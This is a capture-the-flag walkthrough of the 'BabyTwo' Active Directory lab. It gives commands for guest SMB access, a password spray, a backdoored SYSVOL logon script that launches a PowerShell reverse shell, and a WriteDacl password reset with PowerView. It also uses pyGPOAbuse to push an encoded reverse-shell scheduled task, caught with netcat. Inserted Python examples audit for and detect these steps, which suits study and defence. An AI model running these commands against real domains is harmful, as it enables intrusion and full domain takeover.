# BabyTwo

## OVERVIEW

---

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760359871436/552ddd32-2393-4d80-a756-45cf78a07d1d.png align="center")

We are given the IP address of the machine, so let's start with an Nmap scan of it.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760273879813/3663710d-630f-4de7-a631-912e40c5eb63.png align="center")

The scan shows the open ports together with the machine's hostname and the DC name, so add both of them to **/etc/hosts**.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760360111156/fef94e80-4df2-42fd-9c52-0777e26a8e13.png align="center")

Since we don't have any user credentials yet, let's try the guest account: `guest` as the username with an empty password.

```bash
nxc smb #MACHINE_IP -u guest -p ''
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760360267812/a995d366-0832-41e2-9f21-1b1d70c1a4be.png align="center")

Guest access to the SMB server is allowed, so let's use **smbmap** to list the shares:

```bash
smbmap -H 10.129.179.22 -u guest -p ''
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760360456626/221fb7ac-c0c7-424c-8300-a9de4b673805.png align="center")

There is a share named **homes** to which the guest user has READ, WRITE access.

Let's access the share using **smbclient**:

```bash
smbclient -U 'guest%' '//baby2.vl/homes'
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760360744830/1df952c4-f1bf-4526-b8f3-7a8c5fccc264.png align="center")

We get access to the share, and its directory listing gives us a list of usernames, which we can save to a file.

We now have usernames but no passwords. There is a chance that some users have their username set as their password, so let's check by spraying each username as its own password with **netexec**:

```bash
nxc smb 10.129.179.22 -u users.txt -p users.txt --no-bruteforce --continue-on-success
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760362297569/7d2eafd7-819f-4715-af9c-f587d7fa9bae.png align="center")

Two users have their username as their password. Now let's list the shares again with smbmap as one of these users.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760362665498/a2b43631-c87c-453e-be0f-48990d1ddf58.png align="center")

We have READ and WRITE access on the docs and apps shares.

So let’s check it out:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760367990115/e4eaa833-9cce-4dce-9c12-f1032c7549d1.png align="left")

When I checked, it was empty, so let's check the SYSVOL share too.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760368521778/ffc2587d-ed30-4618-9633-28e37e40fedd.png align="center")

I saw a **login.vbs** file, so let's see what it consists of:

```vbscript
Sub MapNetworkShare(sharePath, driveLetter)
    Dim objNetwork
    Set objNetwork = CreateObject("WScript.Network")    
  
    ' Check if the drive is already mapped
    Dim mappedDrives
    Set mappedDrives = objNetwork.EnumNetworkDrives
    Dim isMapped
    isMapped = False
    For i = 0 To mappedDrives.Count - 1 Step 2
        If UCase(mappedDrives.Item(i)) = UCase(driveLetter & ":") Then
            isMapped = True
            Exit For
        End If
    Next
    
    If isMapped Then
        objNetwork.RemoveNetworkDrive driveLetter & ":", True, True
    End If
    
    objNetwork.MapNetworkDrive driveLetter & ":", sharePath
    
    If Err.Number = 0 Then
        WScript.Echo "Mapped " & driveLetter & ": to " & sharePath
    Else
        WScript.Echo "Failed to map " & driveLetter & ": " & Err.Description
    End If
    
    Set objNetwork = Nothing
End Sub

MapNetworkShare "\\dc.baby2.vl\apps", "V"
MapNetworkShare "\\dc.baby2.vl\docs", "L"
```

This is a user logon script that maps network shares, which means it is executed every time a user logs in. Since we have write access to these two shares, we can embed a reverse shell in this file so that the next time a user logs in, it is executed and gives us a shell.
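From the defender's side, the weak point here is a logon script that low-privileged users can overwrite. The following Python is an added example (not part of the original write-up) that audits a copy of such a script for exactly this tampering: a SHA-256 mismatch against a known-good baseline plus an appended WScript.Shell launcher running encoded PowerShell, which it decodes for the analyst. The script text, baseline and encoded command are all constructed here.

```python
import base64
import hashlib
import re

# Constructed sample: the tail of the original logon script, its known-good hash, and a
# tampered copy with a WScript.Shell launcher appended (the pattern described above).
ORIGINAL_SCRIPT = (
    'MapNetworkShare "\\\\dc.baby2.vl\\apps", "V"\r\n'
    'MapNetworkShare "\\\\dc.baby2.vl\\docs", "L"\r\n'
)
BASELINE_SHA256 = hashlib.sha256(ORIGINAL_SCRIPT.encode()).hexdigest()
# PowerShell -EncodedCommand takes base64 of UTF-16LE text; the command here is harmless.
_ENC = base64.b64encode("Write-Host 'constructed sample'".encode("utf-16le")).decode()
TAMPERED_SCRIPT = ORIGINAL_SCRIPT + (
    'Set oShell = CreateObject("WScript.Shell")\r\n'
    f'oShell.run "powershell -nop -w hidden -enc {_ENC}"\r\n'
)

# Constructs a share-mapping logon script in SYSVOL should not normally contain.
SHELL_OBJECT = re.compile(r'CreateObject\(\s*"(WScript\.Shell|Shell\.Application)"', re.I)
ENCODED_PS = re.compile(
    r'powershell[^\r\n"]*?\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)', re.I
)


def decode_encoded_command(b64: str) -> str:
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE text)."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable>"


def audit_logon_script(content: str, baseline_sha256: str) -> dict:
    """Return integrity and content findings for one logon script."""
    findings = []
    current = hashlib.sha256(content.encode()).hexdigest()
    if current != baseline_sha256:
        findings.append("hash mismatch against known-good baseline")
    for lineno, line in enumerate(content.splitlines(), 1):
        obj = SHELL_OBJECT.search(line)
        if obj:
            findings.append(f"line {lineno}: instantiates {obj.group(1)}")
        enc = ENCODED_PS.search(line)
        if enc:
            decoded = decode_encoded_command(enc.group(1))
            findings.append(f"line {lineno}: encoded PowerShell -> {decoded!r}")
    return {"sha256": current, "tampered": bool(findings), "findings": findings}
```

Running the audit over every script in the NETLOGON/SYSVOL scripts folder on a schedule, with baselines kept off the share, turns this write-access weakness into an alert rather than a silent code-execution path.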

---

## USER FLAG / LOCAL SHELL

First, head to [**revshells.com**](https://www.revshells.com/) and select the PowerShell base64 payload.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760369606116/f639c5d5-00b1-436d-92a9-10439b69d3ee.png align="center")

**NOTE: Remember to change the LOCAL MACHINE IP and port.**

Now edit login.vbs on your local machine and add the lines below to it:

```vbscript
Set oShell = CreateObject("WScript.Shell")
oShell.run "your-powershell-payload"
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760370099841/fe5361ff-73d9-446b-ad19-3731f320417c.png align="center")

Now go back to the SMB shell, remove the original file, and upload your modified copy from the directory where you saved login.vbs:

```text
del login.vbs
put login.vbs
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760371197534/d1c36380-3d37-4390-83ee-673ad06a5f78.png align="center")

Start a netcat listener on that port on your local machine, and you will get a shell.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760371441427/149341da-e52f-4d39-b3d6-ce6a03399ad7.png align="left")

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760371525150/6f990967-e763-4359-b5e1-bb6283847e4b.png align="left")

We are now logged in as amelia.griffiths.

**Now go to C:\\ and get the user flag.**

---

## PRIVILEGE ESCALATION / ROOT FLAG

Remember that we also have Carl.Moore's username and password, so we can run bloodhound-python with them:

```bash
bloodhound-python -u Carl.Moore -p Carl.Moore -d baby2.vl -ns 10.129.179.22 -c ALL --zip
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760372310915/d3e9ed13-93c8-4d34-8063-15a70a352428.png align="center")

Now let's analyze the data in BloodHound: start neo4j and open BloodHound.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760372807882/5e2fcda9-289e-4116-8da5-1e8e8b024a67.png align="center")

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760373212858/2c89fa39-204b-40c4-a8d3-665d33d9d3d9.png align="center")

We own the user Amelia Griffiths, and the shortest path from owned principals is shown above: she is a member of **LEGACY@BABY2.VL**, which has WriteDacl over the user **GPOADM@BABY2.VL**. Once we own that user, we can use its GenericAll right for privilege escalation.

---

## WRITEDACL

To perform this attack you need the **PowerView.ps1** module, so first clone or download it from [https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon) to your local machine.

Then start a local Python web server in the directory where you downloaded PowerView.ps1:

```bash
python3 -m http.server 8000
```

and from the `PS C:\Temp>` prompt in your shell, download the module from your local machine and load it:

```powershell
Invoke-WebRequest -Uri 'http://LOCAL-SERVER-IP:8000/PowerView.ps1' -OutFile 'C:\Temp\PowerView.ps1'
. C:\Temp\PowerView.ps1
```

With PowerView loaded, run the following to grant Amelia.Griffiths full rights over gpoadm and change the gpoadm account password:

```powershell
add-domainobjectacl -rights "all" -targetidentity "gpoadm" -principalidentity "Amelia.Griffiths"

$cred = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

set-domainuserpassword gpoadm -accountpassword $cred
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760375429787/5afdb7c1-9022-4338-9199-660633e8bb5b.png align="center")

Our WriteDacl attack was successful.
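This chain (a DACL write on gpoadm followed within seconds by a reset of that account's password) leaves a clear trail in the DC's Security log: event 5136 with nTSecurityDescriptor as the modified attribute, then event 4724 against the same account. The Python below is an added detection example, not anything from the original post, that correlates the two on constructed sample events; field names follow the Windows Security event schema, while the timestamps, accounts and 30-minute window are assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample events; field names follow the Windows Security log schema for
# 5136 (directory service object modified) and 4724 (password reset attempted).
EVENTS = [
    {"time": "2025-10-13T18:01:02", "id": 5136, "SubjectUserName": "Amelia.Griffiths",
     "ObjectDN": "CN=gpoadm,CN=Users,DC=baby2,DC=vl", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor", "OperationType": "%%14674"},
    {"time": "2025-10-13T18:01:09", "id": 4724, "SubjectUserName": "Amelia.Griffiths",
     "TargetUserName": "gpoadm"},
    # Routine reset by a helpdesk account with no preceding DACL change: must not alert.
    {"time": "2025-10-13T09:15:00", "id": 4724, "SubjectUserName": "helpdesk.svc",
     "TargetUserName": "j.doe"},
]
DACL_WINDOW = timedelta(minutes=30)  # assumed correlation window


def cn_from_dn(dn: str) -> str:
    """Return the leading CN value of a distinguished name (CN=gpoadm,... -> gpoadm)."""
    first = dn.split(",", 1)[0]
    return first.split("=", 1)[1] if "=" in first else first


def detect_dacl_then_reset(events: list, window: timedelta = DACL_WINDOW) -> list:
    """Alert when a 4724 password reset follows a 5136 nTSecurityDescriptor write on the
    same user object by the same subject within `window` (the WriteDacl -> reset chain)."""
    dacl_writes = [
        e for e in events
        if e["id"] == 5136 and e.get("ObjectClass") == "user"
        and e.get("AttributeLDAPDisplayName") == "nTSecurityDescriptor"
    ]
    alerts = []
    for reset in (e for e in events if e["id"] == 4724):
        t_reset = datetime.fromisoformat(reset["time"])
        for w in dacl_writes:
            elapsed = t_reset - datetime.fromisoformat(w["time"])
            same_target = cn_from_dn(w["ObjectDN"]).lower() == reset["TargetUserName"].lower()
            same_actor = w["SubjectUserName"].lower() == reset["SubjectUserName"].lower()
            if same_target and same_actor and timedelta(0) <= elapsed <= window:
                alerts.append({
                    "actor": reset["SubjectUserName"], "target": reset["TargetUserName"],
                    "dacl_write": w["time"], "password_reset": reset["time"],
                    "note": "DACL modified on target, then password reset by the same principal",
                })
    return alerts
```

Event 5136 is only emitted when a SACL on the object requests auditing of writes, so the detection depends on "Audit Directory Service Changes" being enabled on the DCs.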

---

## GENERIC ALL

Now let's get the root shell via the GenericAll right, which in this case is an ACL over a Group Policy Object.

For this we will use the [**pyGPOAbuse**](https://github.com/Hackndo/pyGPOAbuse) tool.

**On your local machine, run the command below. The PowerShell reverse shell payload is the same as before (don't include the leading `powershell -e`).**

**BE SURE TO USE A DIFFERENT PORT FROM BEFORE TO AVOID GETTING THE SAME LOCAL SHELL AGAIN**

```bash
python3 pygpoabuse.py baby2.vl/gpoadm:'Password123!' -command "powershell -exec bypass -enc base64-rev-powershell" -dc-ip ATTACK-MACHINE-IP -gpo-id "YOUR-GPO-ID"
```

You can get the GPO ID from BloodHound, in the node's properties section.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760375829176/fd15672f-a342-40bc-910c-1ba9dbb2af73.png align="center")

**Example cmd:**

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760376047707/1f8d770f-fa35-495a-aa61-bf1330f9f6b3.png align="center")

**Schedule Task is successfully created.**

Now go back to the local shell you got earlier and run the following command to get the root shell:

```powershell
gpupdate
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760376310292/fc84fb4c-c1e7-4696-85fd-7b9f2156384b.png align="left")

Now catch it with a netcat listener:

```bash
nc -lvnp 9000
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760376400932/4b579733-190b-4028-81e9-5c113c0dccde.png align="left")

Here We Go !!

We have the root shell; now grab root.txt from **C:\\Users\\Administrator\\root.txt**.
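pyGPOAbuse delivers its payload as an immediate scheduled task written into the GPO's Group Policy Preferences file under SYSVOL, so that file is what a defender should be watching. The Python below is an added example, not part of the write-up or of pyGPOAbuse, that audits a constructed ScheduledTasks.xml and explains why each entry deserves review: immediate tasks, SYSTEM or highest-available run level, and encoded or execution-policy-bypassing PowerShell arguments. Task names, accounts, paths and the placeholder base64 are all constructed.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample modelled on a Group Policy Preferences ScheduledTasks.xml
# (SYSVOL\<domain>\Policies\{GPO-ID}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml).
SAMPLE_XML = r"""<ScheduledTasks>
  <ImmediateTaskV2 name="TASK_INSTALL" changed="2025-10-13 18:20:00">
    <Properties action="C" name="TASK_INSTALL" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.3">
        <Principals><Principal id="Author"><UserId>NT AUTHORITY\System</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
        <Actions Context="Author"><Exec><Command>powershell</Command><Arguments>-exec bypass -enc BASE64-PLACEHOLDER</Arguments></Exec></Actions>
      </Task>
    </Properties>
  </ImmediateTaskV2>
  <TaskV2 name="Inventory" changed="2025-01-08 09:00:00">
    <Properties action="U" name="Inventory" runAs="BABY2\svc_inventory" logonType="Password">
      <Task version="1.3">
        <Principals><Principal id="Author"><UserId>BABY2\svc_inventory</UserId><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
        <Actions Context="Author"><Exec><Command>C:\Tools\inventory.exe</Command><Arguments>/quiet</Arguments></Exec></Actions>
      </Task>
    </Properties>
  </TaskV2>
</ScheduledTasks>"""

# -enc/-e/-ec/-encodedcommand with a base64 blob, or an execution-policy bypass.
SUSPICIOUS_ARGS = re.compile(
    r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=-]+|-exec(?:utionpolicy)?\s+bypass", re.I
)


def audit_gpp_scheduled_tasks(xml_text: str) -> list:
    """Return one record per task with the reasons it deserves review (empty = routine)."""
    results = []
    for task in ET.fromstring(xml_text):
        props = task.find("Properties")
        run_as = (props.get("runAs") or "") if props is not None else ""
        run_level = task.findtext("Properties/Task/Principals/Principal/RunLevel", default="")
        command = task.findtext("Properties/Task/Actions/Exec/Command", default="")
        args = task.findtext("Properties/Task/Actions/Exec/Arguments", default="")
        reasons = []
        if task.tag == "ImmediateTaskV2":
            reasons.append("immediate task: runs on the next policy refresh of every linked computer")
        if run_as.lower().endswith("\\system") or run_level == "HighestAvailable":
            reasons.append("runs as SYSTEM or with highest available privileges")
        if SUSPICIOUS_ARGS.search(args):
            reasons.append("encoded or execution-policy-bypassing PowerShell arguments")
        results.append({"name": task.get("name"), "type": task.tag,
                        "command": f"{command} {args}".strip(), "reasons": reasons})
    return results
```

Pair this file audit with the GPO's versionNumber changes (event 5136 on the groupPolicyContainer object) so that a new immediate task is flagged before the next gpupdate applies it.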

## **WE FINALLY DID IT !!!! CHALLENGE SOLVED !!**

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760376615600/cba13757-7f6f-4914-b703-b0a33c99b7a7.png align="center")

For any query or problem, either leave a comment or contact me at [**reapsec.com**](http://reapsec.com/)

**THANKS FOR READING !!!**
